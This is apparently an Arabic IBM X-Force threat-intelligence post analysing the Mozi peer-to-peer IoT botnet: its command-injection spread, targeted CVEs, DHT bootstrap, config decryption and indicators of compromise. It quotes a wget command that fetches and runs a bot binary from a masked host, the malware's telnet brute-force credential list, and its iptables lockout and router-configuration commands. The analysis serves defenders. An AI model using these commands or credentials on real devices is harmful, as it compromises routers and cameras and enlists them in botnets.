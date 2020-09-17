الأمن

هجوم جديد بشبكة الروبوتات ظهر في الأرجاء مؤخرًا

مبرمجة منكبة على عملها على كمبيوتر في مكتب

مؤلف

Dave McMillen

Senior Threat Researcher

IBM X-Force

Wei Gao

Malware Reverse Engineer

Charles DeBeck

Senior Cyber Threat Intelligence Analyst - IBM

اكتشفت IBM X-Force أن هناك لاعبًا جديدًا نسبيًا في مجال التهديدات، وهو شبكة الروبوتات Mozi، قد انتشر بشكل كبير بين أجهزة إنترنت الأشياء (IOT).

هذا البرنامج الضار نشط منذ أواخر 2019 ويتداخل كوده مع كود Mirai وإصداراته. استحوذ Mozi على ما يقرب من 90% من حركة مرور شبكة إنترنت الأشياء (IOT) في الفترة ما بين أكتوبر 2019 حتى يونيو 2020.

وقد صاحب هذا الاستحواذ المذهل زيادة كبيرة في نشاط شبكة روبوتات إنترنت الأشياء (IOT) بشكل عام، ما يشير إلى أن Mozi لم يُخرج منافسيه من السوق. بل على العكس، فقد غمروا السوق، ما قلل من نشاط الإصدارات الأخرى. بشكل عام، كانت حالات هجوم إنترنت الأشياء المجمعة في الفترة ما بين أكتوبر 2019، عندما بدأت الهجمات في الزيادة بشكل ملحوظ، وحتى يونيو 2020 أعلى بنسبة 400% من حالات هجوم إنترنت الأشياء المجمعة طوال العامين السابقين.

رسم بياني لحجم هجمات إنترنت الأشياء (IOT) في الفترة ما بين يونيو 2018 إلى مايو 2020

قد ترجع هذه الزيادة في هجمات إنترنت الأشياء إلى عدة الأسباب، ولكنها قد تكون ناتجة جزئيًا عن التوسع المستمر في مجال إنترنت الأشياء الذي يستهدفه عناصر التهديد. يوجد حوالي 31 مليار جهاز إنترنت الأشياء (IOT) منتشر حول العالم، ويبلغ معدل نشر إنترنت الأشياء (IOT) الآن 127 جهازًا في الثانية.

لقد استغل المهاجمون هذه الأجهزة منذ فترة، لا سيما عبر شبكة الروبوتات Mirai. وقد كان فريق خدمات الاستجابة للحوادث والاستخبارات (IRIS) في IBM X-Force يتابعها منذ ما يقرب من أربع سنوات. لكن ما سبب الزيادة المفاجئة؟ تشير أبحاث IBM إلى استمرار نجاح Mozi بشكل كبير من خلال استخدام هجمات حقن الأوامر (CMDi)، والتي غالبًا ما تنتج عن أخطاء تكوينات أجهزة إنترنت الأشياء (IOT). ويُعد نمو استخدام إنترنت الأشياء (IOT) وبروتوكولات التكوين الضعيفة من الأسباب المحتملة وراء هذه الزيادة. وربما تكون هذه الزيادة قد تعززت أكثر بسبب زيادة الوصول المتكرر إلى شبكات الشركات عن بُعد بسبب كوفيد-19.

أجهزة إنترنت الأشياء (IOT) موجودة في كل مكان

يمكن استخدام شبكة روبوتات إنترنت الأشياء (IOT) لتنفيذ هجمات موزعة لحجب الخدمة (DDoS)، وسرقة البيانات، وإرسال الرسائل المزعجة. يوجد عدد كبير من الأنواع المختلفة من أجهزة إنترنت الأشياء (IOT) التي يمكن استغلالها:

  • إنترنت الأشياء (IOT) الاستهلاكي: الأجهزة المنزلية، مثل كاميرات المراقبة وأنظمة التحكم في الإضاءة والأجهزة الكهربائية وغيرها.
  • إنترنت الأشياء (IOT) التجاري: الأجهزة المصممة للاستخدام في مختلف المجالات. على سبيل المثال، يتوفر في قطاع الرعاية الصحية أجهزة تنظيم نبضات القلب وشاشات متصلة بالإنترنت. يستخدم قطاع النقل والتشييد أجهزة مرتبطة بأجهزة تتبع المركبات، والاتصال عن بُعد، وأنظمة اللوجستيات وسلسلة التوريد، ونمذجة معلومات البناء.
  • إنترنت الأشياء (IOT) المؤسسي: الأجهزة المصممة للاستخدام في المكاتب، مثل أجهزة العرض وأجهزة التوجيه وأنظمة الأمان والإعلانات الرقمية.
  • إنترنت الأشياء (IOT) الصناعي: أنظمة التحكم الصناعية، وأنظمة أتمتة خطوط الإنتاج، ووحدات التحكم المنطقية، وأنظمة الطيران.
  • إنترنت الأشياء (IOT) البنية التحتية: أنظمة إدارة المدن الذكية، وأجهزة التحكم في حركة المرور، وأجهزة مراقبة مرافق الخدمات، وغيرها.
  • إنترنت الأشياء (IOT) العسكري: أجهزة القياسات الحيوية القتالية القابلة للارتداء، والروبوتات، وأجهزة الاستطلاع.

نطاق الهجوم الكبير هذا يجعل المؤسسات عرضة لخطر شبكة روبوتات إنترنت الأشياء (IOT). أضف إلى ذلك الثغرات الأمنية التي غالبًا ما تكون موجودة في هذه الأجهزة عند شرائها، وممارسات التعزيز الأمني غير الجادة عند النشر. تأتي الثغرة الأبرز في إنترنت الأشياء (IOT) عبر هجمات حقن الأوامر.

هجمات حقن الأوامر تنشر شبكة الروبوتات Mozi

حاولت تقريبًا جميع عمليات استهداف إنترنت الأشياء التي رصدتها IBM استخدام هجمات حقن الأوامر بهدف الوصول الأولي إلى الجهاز. وإذا كانت نقطة النهاية المستهدفة جهاز إنترنت الأشياء (IOT) وكانت عرضة لهذه الهجمات، فسيتم تنزيل الحمولة وتنفيذها.

هجمات حقن الأوامر شائعة جدًا ضد أجهزة إنترنت الأشياء (IOT) لأسباب عدة. أولاً، تحتوي أنظمة إنترنت الأشياء (IOT) المضمنة عادةً على واجهة ويب وواجهة تصحيح أخطاء متبقية من عملية تطوير البرامج الثابتة ويمكن استغلالهما. ثانيًا، يمكن استغلال وحدات PHP المدمجة في واجهات الويب الخاصة بإنترنت الأشياء (IOT) لمنح العناصر الخبيثة فرصة التنفيذ عن بُعد. وثالثًا، غالبًا ما تُترك واجهات إنترنت الأشياء (IOT) عرضة للخطر عند نشرها لأن المسؤولين يفشلون في تعزيز أمن الواجهات من خلال تنقية المدخلات عن بُعد المتوقعة. يسمح ذلك لعناصر التهديد بإدخال أوامر shell مثل "wget".

كشف تحليلنا أن شبكة الروبوتات Mozi تستفيد من هجمات حقن الأوامر باستخدام أمر shell المسمى “wget”، ثم تُغير الأذونات للسماح لعنصر التهديد بالتفاعل مع النظام المتأثر. على سبيل المثال:

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

إذا كان المضيف عرضة لهجمات حقن الأوامر، فسيؤدي هذا الأمر إلى تنزيل ملف يُسمى "mozi.a." وتنفيذه. يشير تحليلنا لهذه العينة تحديدًا إلى أن الملف يُنفذ على بنية معالج دقيق من دون مراحل متشابكة (MIPS). وهذا الامتداد تفهمه الأجهزة التي تعمل على بنية كمبيوتر مجموعة التعليمات المخفضة (RISC)، وهي سائدة في العديد من أجهزة إنترنت الأشياء (IOT). بمجرد أن يحصل المهاجم على صلاحية وصول كامل إلى الجهاز عبر شبكة الروبوتات، يمكن تغيير مستوى البرامج الثابتة وزرع برنامج ضار آخر على الجهاز.

على الرغم من أن هذا المثال يستشهد بمتجه معروف، فإنه قد يظل فعالاً لسببين رئيسيين. أولاً، تسمح الثغرات الأمنية الجديدة بالتحديث المستمر لمحاولات الاستغلال عبر هجمات حقن الأوامر، ويمكن استغلال التنفيذ البطيء للتحديثات الأمنية. ثانيًا، يمكن أتمتة هذا النشاط بسهولة، ما يسمح لعناصر التهديد بضرب شريحة واسعة من الأجهزة بسرعة وبتكلفة منخفضة.

يبدو أن المصدر الرئيسي للبنية التحتية لشبكة الروبوتات Mozi هو الصين، حيث تستحوذ على 84% من البنية التحتية المرصودة. تتماشى هذه الحقيقة مع بحث آخر مفتوح المصدر حول نشاط إنترنت الأشياء (IOT) في عام 2020.

فيما يلي قائمة بالثغرات التي رصدتها IBM والتي تحاول شبكة الروبوتات Mozi استغلالها:

الثغرة الأمنيةالجهاز المتأثر
CVE-2017-17215هواوى HG532
CVE-2018-10561 / CVE-2018-10562أجهزة توجيه GPON
CVE-2014-8361الأجهزة التي تستخدم Realtek SDK
جهاز التوجيه اللاسلكي Eir D1000 RCIجهاز التوجيه اللاسلكي Eir D1000
CVE-2008-4873Sepal SPBOARD
CVE-2016-6277Netgear R7000 / R6400
Netgear setup.cgi RCE غير الموثقةNetgear DGN1000
تنفيذ أوامر MVPower DVRMVPower DVR TV-7104HE
CVE-2015-2051أجهزة D-Link
تنفيذ أوامر D-Link UPnP SOAPأجهزة D-Link
موردو CCTV-DVR RCEموردو CCTV-DVR المتعددون
التحليل التقني لشبكة الروبوتات Mozi

شبكة الروبوتات Mozi هي شبكة روبوتات من نظير إلى نظير (P2P) تعتمد على بروتوكول جدول التجزئة العشوائي الموزع (DSHT)، والتي يمكن أن تنتشر عبر استغلال ثغرات أجهزة إنترنت الأشياء (IOT) وكلمات مرور telnet الضعيفة.

عند التنفيذ، تحاول شبكة الروبوتات Mozi ربط منفذ UDP المحلي رقم 14737. تقرأ العينة /proc/net/tcp أو /proc/net/raw للعثور على العمليات التي تستخدم المنفذين 1536 و5888 وإيقافها. تتحقق العينة مما إذا كان الملف /usr/bin/python موجودًا. وإذا كان موجودًا، فستغير العينة اسم عمليتها إلى sshd. وإن لم يكن موجودًا، فستغير العينة الاسم إلى dropbear.

من المعروف أن شبكة روبوتات Mozi تتمتع بسمتين فريدتين على الأقل. تستخدم ECDSA384 (خوارزمية التوقيع الرقمي للمنحنى الإهليلجي 384) للتحقق من سلامتها. بالإضافة إلى ذلك، تُعيد استخدام أجزاء من كود Gafgyt.

وتحتوي على عُقد DHT عامة مشفرة ضمنيًا، والتي يمكن استخدامها للانضمام إلى شبكة النظير إلى النظير (P2P). فيما يلي هذه العُقد:

dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

تحتوي شبكة الروبوتات Mozi على أربع إمكانات رئيسية. يمكنها تنفيذ هجوم موزع لحجب الخدمة (DDoS) (HTTP، وTCP، وUDP)؛ وتنفيذ هجوم تنفيذ الأوامر؛ وتنزيل الحمولة الخبيثة من عنوان URL محدد وتنفيذها؛ وجمع معلومات حول الروبوت.

قائمة الملفات

يحتوي الجدول أدناه على تفاصيل موجزة حول الملفات التي جرى تحليلها. تشمل التفاصيل الملفات المرسلة والملفات المتبقية. (الملفات المتبقية هي ملفات تُستخرج بشكل ثابت أو ديناميكي في أثناء تحليل البرنامج الضار.) تشمل البيانات اسم الملف، وفئة الملف كما يحددها التحليل، وتجزئة الملف، ونسب الملف بالنسبة إلى الملفات الأخرى في الجدول.

اسم الملففئة الملفتجزئة الملفالملف الأصلي
mozi.mشبكة الروبوتات4dde761681684d7edad4e5e1ffdb940bلا ينطبق
5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0aشبكة الروبوتات86d42d968d3d12c36722e16c78e49ffbmozi.m
mozi.aشبكة الروبوتات9a111588a7db15b796421bd13a949cd4لا ينطبق
83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053dشبكة الروبوتاتdd4b6f3216709e193ed9f06c37bcc3890mozi.a

التحليل السلوكي لشبكة الروبوتات Mozi

عند التنفيذ، تحاول العينة ربط منفذ UDP المحلي رقم 14737. تقرأ العينة /proc/net/tcp أو /proc/net/raw للعثور على العمليات التي تستخدم المنفذين 1536 و5888 وإيقافها. تتحقق العينة مما إذا كان الملف /usr/bin/python موجودًا. وإذا كان موجودًا، فستغير العينة اسم عمليتها إلى sshd. وإن لم يكن موجودًا، فستغير العينة الاسم إلى dropbear.

تتحقق العينة مما إذا كان الملف /usr/bin/python موجودًا. وإذا كان موجودًا، فستغير العينة اسم عمليتها إلى sshd. وإن لم يكن موجودًا، فستغير العينة الاسم إلى dropbear.

تحاول العينة أيضًا تحديث قائمة التحكم في الوصول لحظر بروتوكولي SSH وtelnet بهدف منع شبكات الروبوت الأخرى من استخدامهما.

iptables -I INPUT  -p tcp –destination-port 22 -j DROP
iptables -I INPUT  -p tcp –destination-port 23 -j DROP
iptables -I INPUT  -p tcp –destination-port 2323 -j DROP
iptables -I OUTPUT -p tcp –source-port 22 -j DROP
iptables -I OUTPUT -p tcp –source-port 23 -j DROP
iptables -I OUTPUT -p tcp –source-port 2323 -j DROP

كما أنها تختار بشكل عشوائي المنافذ المشفرة ضمنيًا في iptable:

لقطة شاشة مأخوذة لمنشور المدونة

DHT

تستخدم شبكة الروبوتات Mozi بروتوكول DHT مخصصًا لتطوير شبكة النظير إلى النظير. تُجرى عملية انضمام عقدة Mozi الجديدة إلى شبكة DHT على النحو التالي:

  • تُرسل عقدة Mozi الجديدة طلب HTTP أوليًا إلى http[:]//ia[.]51[.]la لتسجيل نفسها.
  • تُرسل عقدة Mozi الجديدة استعلام DHT find_node إلى ثماني عُقد DHT عامة مشفرة ضمنيًا وتربط هذه العُقد للانضمام إلى الشبكة. يُستخدم استعلام find_node للعثور على معلومات الاتصال الخاصة بأي عقدة بناءً على معرفها. فيما يلي عُقد DHT الثماني العامة والمشفرة ضمنيًا:
dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

تحتاج العينة إلى إنشاء معرّف للعقدة الحالية. وفقًا لتقرير 360 Netlab حول Mozi، "يبلغ المعرّف 20 بايت ويتكون من البادئة 888888 المضمنة في العينة أو البادئة المحددة في ملف التكوين [hp]، بالإضافة إلى سلسلة مُنشأة عشوائيًا." يظهر ملف التكوين أدناه:.

[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]

للانضمام إلى شبكة DHT، تُرسل العينة استعلام ping إلى عُقد DHT العامة والمشفرة ضمنيًا هذه. يظهر استعلام ping مع معرّف العقدة في حركة المرور في شكل Wireshark أدناه

يظهر استعلام ping مع معرّف العقدة في حركة المرور في Wireshark

التحليل الثابت

تُضغط كلتا العينتين باستخدام أداة ضغط UPX مخصصة. فهي تمحو قيمة p_file_size وp_blocksize وتحولها إلى الصفر في بنية p_info.

ملف التكوين

تحتوي العينة على ملف تكوين مشفر ضمنيًا، معروض أدناه:

العينة التي تحتوي على ملف تكوين مشفر ضمنيًا

يحتوي على أربعة أقسام:

  • الأزرق: بيانات التكوين (428 بايت)
  • الأخضر: توقيع ECDSA384 الأول (96 بايت)
  • الأحمر: إصدار التكوين (4 بايت)
  • الأسود: توقيع ECDSA384 الثاني (96 بايت)

تُشفر بيانات التكوين باستخدام مفتاح XOR مشفر ضمنيًا، وهو 4E665A8F80C8AC238DAC4706D54F6F7E. تظهر بيانات التكوين بعد فك تشفيرها أدناه:

[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count]

تدعم بيانات التكوين أوامر متعددة موسومة بعلامات على النحو التالي:

العلامة (الأمر)الوصف
[ss]دور الروبوت
[ssx]تمكين/تعطيل العلامة [ss]
[cpu]بنية وحدة المعالجة المركزية
[cpux]تمكين/تعطيل العلامة [cpu]
[nd]عقدة DHT الجديدة
[hp]بادئة تجزئة عقدة DHT
[atk]نوع الهجوم الموزع لحجب الخدمة (DDoS)
[ver]القيمة في القسم V من بروتوكول DHT
[sv]تحديث التكوين
[ud]تحديث الروبوت
[dr]تنزيل الحمولة من عنوان URL المحدد وتنفيذها
[rn]تنفيذ الأمر المحدد
[dip]عنوان IP والمنفذ المطلوبان لتنزيل روبوت Mozi
[idp]الإبلاغ عن الروبوت
[count]عنوان URL المستخدم للإبلاغ عن الروبوت

تُعيد شبكة الروبوتات Mozi استخدام أجزاء من كود Gafgyt في الهجوم الموزع لحجب الخدمة (DDoS). وتدعم أنواعًا متعددة من الهجوم الموزع لحجب الخدمة (DDoS) مثل HTTP وTCP وUDP.

يُستخدم توقيع ECDSA384 الأول للتحقق من قيمة التجزئة الخاصة ببيانات التكوين. فيما يلي المفتاح العام المشفر ضمنيًا والمستخدم للتحقق منها:

4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 
E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 
22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 
88

تُشفر باستخدام مفتاح XOR التالي: 4E665A8F80C8AC238DAC4706D54F6F7E. فيما يلي المفتاح العام بعد فك تشفيره:

02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 
a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 
6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 09 
c6

يحدد إصدار التكوين وقت تحديث الروبوت. سيُحدّث الروبوت عندما تكون هذه القيمة أكبر من القيمة الحالية. يُستخدم توقيع ECDSA384 الثاني للتحقق من الأجزاء الثلاثة الأولى من ملف التكوين. فيما يلي المفتاح العام المشفر ضمنيًا والمستخدم للتحقق منها:

4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 
69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 
38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 2F 9E 94 
A1

تُشفر باستخدام مفتاح XOR التالي: 4E665A8F80C8AC238DAC4706D54F6F7E. فيما يلي المفتاح العام بعد فك تشفيره:

02 d5 d5 e7 41 ee dc c8 10 6d 2f 48 0d 04 12 21 
27 39 c7 45 0d 2a d1 40 72 01 d1 8b cd c4 16 65 
76 57 c1 9d e9 bb 05 0d 3b cf 6e 70 79 60 f1 ea 
ef

تعداد تسجيل الدخول عبر Telnet

بالإضافة إلى الثغرات التي تستغلها شبكة الروبوتات Mozi لكي تتمكن من الوصول إلى الجهاز المستهدف، يمكن لشبكة الروبوتات Mozi أيضًا تنفيذ هجمات القوة الغاشمة للحصول على بيانات اعتماد telnet، وذلك باستخدام قائمة مشفرة ضمنيًا من بيانات الاعتماد:

root
admin
CUAdmin
default
rapport
super
telnetadmin
!!Huawei
keomeo
support
CMCCAdmin
e8telnet
e8ehome1
e8ehome
user
mother
Administrator
service
supervisor
guest
admin1
administrator
666666
888888
ubnt
tech
xc3511
vizxv
Pon521
e2008jl
r@p8p0r+
GM8182
gpon
Zte521
hg2x0
epicrouter
conexant
xJ4pCYeW
v2mprt
PhrQjGzk
h@32LuyD
gw1admin
adminpass
xmhdipc
juantech
@HuaweiHgw
adminHW
2010vesta
2011vesta
plumeria0077
cat1029
123456
54321
hi3518
password
12345
fucker
pass
admin1234
1111
smcadmin
1234
klv123
klv1234
zte
jvbzd
anko
zlxx
7ujMko0vizxv
7ujMko0admin
system
ikwb
dreambox
realtek
00000000
1111111
meinsm

فيما يلي أحد هجمات القوة الغاشمة للحصول على بيانات تسجيل الدخول عبر telnet والتي استخدمتها العينة:

هجوم قوة غاشمة للحصول على بيانات تسجيل دخول عبر telnet

المؤشرات

Mozi.m وMozi.a

الشبكة

dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

سلاسل بارزة (غير مضغوطة)

8.8.8.8
/proc/net/route
Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)
Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
GET
HEAD
POST
./config
/tmp/config
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1″>http://127.0.0.1”
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi”
iptables -I INPUT  -p tcp –destination-port 35000 -j DROP
iptables -I INPUT  -p tcp –destination-port 50023 -j DROP
iptables -I OUTPUT -p tcp –source-port 50023 -j DROP
iptables -I OUTPUT -p tcp –source-port 35000 -j DROP
iptables -I INPUT  -p tcp –destination-port 7547 -j DROP
iptables -I OUTPUT -p tcp –source-port 7547 -j DROP
[cpux]
[/cpux]
[cpu]
[/cpu]
[ssx]
[/ssx]
[ss]
[/ss]
none
[sv]
[/sv]
[rn]
[/rn]
run:
[nd]
[/nd]
/tmp
/var
/temp
iptables -I INPUT  -p udp –destination-port %d -j ACCEPT
iptables -I OUTPUT -p udp –source-port %d -j ACCEPT
iptables -I PREROUTING  -t nat -p udp –destination-port %d -j ACCEPT
iptables -I POSTROUTING -t nat -p udp –source-port %d -j ACCEPT
0.0.0.0
[idp]
This node doesn’t accept announces
dht.transmissionbt.com:6881
router.bittorrent.com:6881
router.utorrent.com:6881
bttracker.debian.org:6881
212.129.33.59:6881
82.221.103.244:6881
130.239.18.159:6881
87.98.162.88:6881

الخاتمة

يستمر مجال شبكة روبوتات إنترنت الأشياء (IOT) في التغير، وتشير بيانات IBM Security إلى أن عناصر التهديد لا تزال نشطة في هذا المجال. في ظل عمل مجموعات شبكة الروبوتات الحديثة، مثل Mozi، على تكثيف عملياتها وزيادة نشاط إنترنت الأشياء بشكل عام، يجب على المؤسسات التي تستخدم أجهزة إنترنت الأشياء أن تكون على دراية بالتهديد المتطور. تشهد شركة IBM تزايدًا في تعرض أجهزة إنترنت الأشياء (IOT) المؤسسية لهجمات المهاجمين. ويظل حقن الأوامر هو الناقل الأساسي للإصابات والمفضل لعناصر التهديد، ما يؤكد أهمية تغيير الإعدادات الافتراضية للأجهزة واستخدام اختبار اختراق فعال لاكتشاف الثغرات في أنظمة الحماية وإصلاحها.

سمات الملف

بيانات Mozi.m الوصفية

اسم الملف:Mozi.m
حجم الملف:108808
MD5:4dde761681684d7edad4e5e1ffdb940b
SHA1:2327be693bc11a618c380d7d3abc2382d870d48b
SHA256:d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
نوع الملف:ملف ELF 32 بت MSB تنفيذي، MIPS، MIPS-I الإصدار 1 (SYSV)، مرتبط بشكل ثابت، ومجرد
الفئة:شبكة الروبوتات
اسم IRIS:Mozi
أسماء أخرى:

بيانات Mozi.a الوصفية

اسم الملف:Mozi.a
حجم الملف:95268
MD5:9a111588a7db15b796421bd13a949cd4
SHA1:034c8c51a58be11ca620ce3eb0d43d5a59275d2f
SHA256:e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
نوع الملف:ملف ELF 32 بت LSB تنفيذي، ARM، الإصدار 1، مرتبط بشكل ثابت، ومجرد
الفئة:شبكة الروبوتات
اسم IRIS:Mozi
أسماء أخرى: 

5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a Metadata البيانات الوصفية

اسم الملف:d546_unpacked
حجم الملف:266108
MD5:86d42d968d3d12c36722e16c78e49ffb
SHA1:ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
SHA256:5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
نوع الملف:ملف ELF 32 بت MSB تنفيذي، MIPS، MIPS-I الإصدار 1 (SYSV)، مرتبط بشكل ثابت، ومجرد
الفئة:شبكة الروبوتات
اسم IRIS:Mozi
أسماء أخرى: 

83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d البيانات الوصفية

اسم الملف:83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
حجم الملف:212464
MD5:dd4b6f3216709e193ed9f06c37bcc389
SHA1:758ba1ab22dd37f0f9d6fd09419bfef44f810345
SHA256:83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
نوع الملف:ملف b’ELF 32 بت LSB تنفيذي، ARM، الإصدار 1، مرتبط بشكل ثابت، ومجرد’
الفئة:شبكة الروبوتات
اسم IRIS:Mozi
أسماء أخرى: 